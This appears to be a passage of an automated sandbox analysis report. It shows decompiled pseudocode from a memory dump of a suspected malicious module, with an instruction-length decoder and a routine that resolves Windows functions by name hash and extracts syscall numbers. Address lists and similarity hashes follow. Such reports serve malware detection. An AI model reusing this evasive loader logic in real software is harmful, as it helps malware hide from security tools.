												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x709992e3
0x709992e7
0x709992f3
0x709992f7
0x709992fb
0x70999300
0x70999303
0x70999305
0x70999307
0x70999307
0x7099930a
0x70999310
0x70999388
0x7099938c
0x7099938f
0x7099938f
0x70999392
0x00000000
0x70999392
0x70999317
0x7099937f
0x70999383
0x00000000
0x70999383
0x7099931e
0x70999377
0x7099937a
0x00000000
0x7099937a
0x70999323
0x70999361
0x70999368
0x7099936b
0x70999334
0x70999334
0x7099933a
0x00000000
0x00000000
0x7099933f
0x70999359
0x7099935c
0x00000000
0x7099935c
0x70999344
0x00000000
0x70999346
0x7099934a
0x7099934d
0x00000000
0x7099934d
0x70999344
0x70999395
0x70999395
0x70999395
0x7099939e
0x709993a7
0x709993aa
0x709993ad
0x709993b0
0x709993b3
0x709993b9
0x709993fb
0x709993fe
0x709993ff
0x70999406
0x70999409
0x709993bb
0x709993bf
0x709993c9
0x709993d0
0x709993d2
0x709993eb
0x709993ee
0x709993ee
0x709993d0
0x70999411
0x70999414
0x70999417
0x7099941b
0x7099941f
0x70999429
0x7099942d
0x70999437
0x70999440
0x7099944d
0x70999450
0x70999453
0x70999453
0x7099945f
0x7099946a
0x70999470
0x70999474
0x70999461
0x70999461
0x70999461
0x7099947c
0x709994a6
0x709994ac
0x709994ac
0x709994b4
0x7099985d
0x70999863
0x70999869
0x70999869
0x00000000
0x709994ba
0x709994ba
0x709994be
0x709994c1
0x709994c4
0x709994c7
0x709994cb
0x709994cd
0x709994d0
0x709994d3
0x709994d7
0x709994dc
0x709994df
0x709994e3
0x709994e8
0x709994eb
0x709994ed
0x709994f0
0x709994f4
0x709994f9
0x70999509
0x7099950f
0x7099950f
0x70999517
0x70999519
0x70999522
0x70999524
0x70999527
0x70999532
0x7099955f
0x70999534
0x7099954b
0x7099954b
0x70999567
0x7099956d
0x70999573
0x70999573
0x70999567
0x70999522
0x7099957a
0x709995eb
0x709995f0
0x70999649
0x7099970b
0x70999710
0x7099971f
0x70999725
0x70999729
0x70999732
0x70999739
0x70999742
0x70999750
0x70999753
0x7099973b
0x7099973b
0x7099973b
0x70999739
0x7099975c
0x70999789
0x7099979c
0x709997a4
0x7099978b
0x7099978d
0x70999795
0x70999795
0x7099975e
0x70999763
0x70999782
0x70999765
0x7099976a
0x7099977b
0x7099976c
0x7099976c
0x7099976c
0x7099976a
0x70999763
0x709997ac
0x709997bb
0x709997c8
0x709997d1
0x709997d5
0x709997d9
0x709997dc
0x709997df
0x709997e2
0x709997e5
0x709997e8
0x709997ee
0x709997f2
0x709997f8
0x709997f8
0x709997ee
0x709997fe
0x7099983b
0x7099983f
0x70999846
0x7099984c
0x70999800
0x70999803
0x70999823
0x70999827
0x7099982e
0x70999835
0x70999805
0x70999808
0x7099980a
0x7099980e
0x70999818
0x7099981e
0x7099981e
0x70999808
0x70999803
0x70999853
0x70999853
0x7099986c
0x7099986c
0x70999872
0x70999877
0x709998d1
0x709998d6
0x70999915
0x7099991a
0x7099991c
0x70999920
0x70999923
0x70999926
0x70999928
0x70999929
0x70999929
0x7099992e
0x7099994c
0x7099994e
0x70999952
0x70999958
0x7099995b
0x7099995d
0x7099995e
0x7099995e
0x00000000
0x70999930
0x70999930
0x70999930
0x70999934
0x7099993a
0x7099993d
0x7099993f
0x70999942
0x70999961
0x70999961
0x70999968
0x70999982
0x7099996a
0x7099996a
0x70999976
0x70999977
0x7099997a
0x7099997a
0x70999990
0x70999990
0x7099992e
0x709998db
0x709998e9
0x70999901
0x70999905
0x70999908
0x7099990e
0x70999912
0x70999912
0x00000000
0x70999912
0x709998eb
0x709998ef
0x709998f5
0x709998f5
0x709998fb
0x00000000
0x709998fb
0x709998dd
0x709998e1
0x00000000
0x709998e1
0x7099987b
0x709998a7
0x709998bf
0x709998c3
0x709998c6
0x709998c9
0x709998cb
0x709998ce
0x709998a9
0x709998a9
0x709998ad
0x709998b0
0x709998b3
0x709998b6
0x709998b9
0x709998b9
0x00000000
0x709998a7
0x70999881
0x00000000
0x00000000
0x70999887
0x7099988b
0x70999891
0x70999894
0x70999897
0x7099989a
0x00000000
0x7099989a
0x70999712
0x70999716
0x7099971c
0x00000000
0x7099971c
0x70999654
0x70999666
0x7099966b
0x709996d6
0x00000000
0x00000000
0x709996dd
0x70999703
0x70999707
0x00000000
0x00000000
0x709996e6
0x709996eb
0x709996ff
0x00000000
0x00000000
0x00000000
0x70999701
0x709996f2
0x00000000
0x00000000
0x709996f7
0x00000000
0x00000000
0x709996f9
0x00000000
0x709996dd
0x7099966d
0x70999677
0x70999688
0x7099968b
0x7099968e
0x70999694
0x00000000
0x00000000
0x00000000
0x00000000
0x7099969a
0x7099969a
0x7099969a
0x709996a1
0x00000000
0x00000000
0x709996a3
0x709996a6
0x709996ac
0x00000000
0x00000000
0x00000000
0x709996ae
0x709996b0
0x709996b9
0x00000000
0x00000000
0x709996cd
0x00000000
0x00000000
0x00000000
0x709996cf
0x7099965b
0x00000000
0x00000000
0x00000000
0x70999661
0x709995f5
0x70999624
0x70999625
0x7099962e
0x00000000
0x7099963f
0x00000000
0x7099963f
0x709995fc
0x709995ff
0x70999612
0x70999613
0x70999617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x709995ff
0x709995f5
0x70999581
0x709995de
0x709995e2
0x709995e8
0x00000000
0x709995e8
0x70999583
0x70999587
0x70999594
0x70999598
0x709995ae
0x709995b6
0x7099959a
0x7099959c
0x709995a6
0x709995a6
0x709995bc
0x709995c5
0x709995dc
0x00000000
0x00000000
0x00000000
0x709995dc
0x709995c7
0x709995c7
0x00000000
0x709995bc

Strings

, xrefs: 70999947

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: 258e1a5a62bbffb8272f0315c0fa8aa005a7c3089f890bea4a197b012f706b72
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: CA22BA304283998BE716CE19C48136EBBFDBFC6304F14882EE8D64B291D7359985DB97

Uniqueness

Uniqueness Score: -1.00%

Function 709914D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E709914D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E709903A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x7099d208 == 0 ||  *0x7099d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E70994BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x7099d2ec |  *0x7099d2ed;
									if(( *0x7099d2ec |  *0x7099d2ed) == 0) {
										_t525 =  *0x7099d208; // 0x4911340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x7099d2ec = 1;
											_t526 = E70993558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E70991CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x7099d208 = _t526;
											 *0x7099d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E70993558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E70991CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E7098E070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E7098E070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x7099d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x7099d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E7098E94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E70992F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x7099d2e4 = 1;
					E7098F620( &(_t535[0x38]), 0);
					E7098F620( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E7098F558( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E70992F94(0xa5eabdf8, 0x22dc1034, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E7098F8C4( &(_t535[0xc]), E7098F568( &(_t535[8])) + 0x14);
								_t369 = E7098F558( &(_t535[0xc]), E7098F568( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E7098F6F0( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E7098F620( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E7098F6F0( &(_t535[8]));
							E7098F6F0( &(_t535[0x164]));
							E7098F620( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E7098F620( &(_t535[0x20]), 0);
							_push(0xa5eabdf8);
							_t289 = E70991DD0(0xa5eabdf8);
							_t290 = E70991388( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E70991D08( &(_t535[0x164]), 0xa5eabdf8);
							_t518 =  &(_t535[0x178]);
							E7098D0D0( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E70995C40( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E70995C74( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E70998D74( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E7098F6F0( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E7098BC00( &(_t535[0x110]));
							}
							E7098D098( &(_t535[0x104]));
							E7098D098(_t518);
							E7098D098( &(_t535[0x15c]));
							E7098D098( &(_t535[0x154]));
							E70999058( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E7098F6B4( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E7099901C( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E7098F558( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E7098F568( &(_t535[0x44]));
								_t519 =  *(0x7099bce0 + _t381 * 4);
								_t531 = E70998FE8( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E70998754( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E7098F568( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E7098F578( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E7098F568( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E7098F8C4( &(_t535[0x20]), E7098F568( &(_t535[0x1c])) + 8);
										E7098F558( &(_t535[0x20]), E7098F568( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E709930A4(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E7098F8C4( &(_t535[0x48]), _t535[0x70]);
									E709930A4(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E7098F8DC( &(_t535[0x44]), _t563);
									E7098F8DC( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E709990A8( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E70999070( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E7098F6F0( &(_t535[0x144]));
									E7098F6F0( &(_t535[0x134]));
									goto L38;
								}
								 *0x7099d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E7098F6F0( &(_t535[0x11c]));
							E70998DD4(_t381,  &(_t535[0xd8]));
							E7098F6F0( &(_t535[0x1c]));
							E7098F6F0( &(_t535[0x44]));
							E7098F6F0( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E7098F558( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E7098F8C4( &(_t535[0x38]), E7098F568( &(_t535[0x34])) + 0x14);
							_t347 = E7098F558( &(_t535[0x38]), E7098F568( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E7098F558( &(_t535[0xc]), _t62);
						_t455 = E7098F558( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x709914e4
0x709914eb
0x709914ee
0x709914f5
0x70991c77
0x70991c77
0x709914fb
0x70991506
0x70991a45
0x70991a49
0x00000000
0x70991cc8
0x70991a4f
0x70991a52
0x70991a55
0x70991a5f
0x70991a6e
0x70991a70
0x70991a77
0x70991c61
0x70991c63
0x70991c66
0x70991c6a
0x00000000
0x70991c6a
0x70991a86
0x70991a91
0x70991a98
0x70991a9b
0x70991a9d
0x70991aa0
0x70991aa3
0x70991aa9
0x70991ab7
0x70991ac7
0x70991aec
0x70991afd
0x70991b00
0x70991b02
0x70991b66
0x70991b69
0x70991b69
0x70991b6b
0x70991b6e
0x70991b72
0x70991b72
0x70991b76
0x00000000
0x00000000
0x70991b83
0x70991b89
0x70991bbd
0x70991bc3
0x70991bc5
0x70991c94
0x70991c9c
0x70991c9f
0x70991ca1
0x70991cb8
0x70991cb8
0x70991ca3
0x70991ca7
0x70991cac
0x70991cac
0x70991cba
0x70991cc0
0x70991bdf
0x70991bdf
0x70991be1
0x70991be1
0x70991be3
0x70991be3
0x70991be8
0x00000000
0x00000000
0x70991bea
0x70991beb
0x70991bee
0x70991bf1
0x00000000
0x00000000
0x70991bfd
0x70991c00
0x70991c02
0x70991c19
0x70991c19
0x70991c04
0x70991c08
0x70991c0d
0x70991c0d
0x70991c26
0x70991c29
0x70991c32
0x70991c35
0x70991c58
0x70991c5c
0x00000000
0x70991c5c
0x70991c3d
0x70991c3d
0x70991c49
0x70991c4c
0x70991c55
0x00000000
0x70991c55
0x70991bcb
0x70991bdb
0x70991bdb
0x70991bdd
0x00000000
0x00000000
0x70991bd3
0x70991bd5
0x70991bd5
0x00000000
0x70991bdb
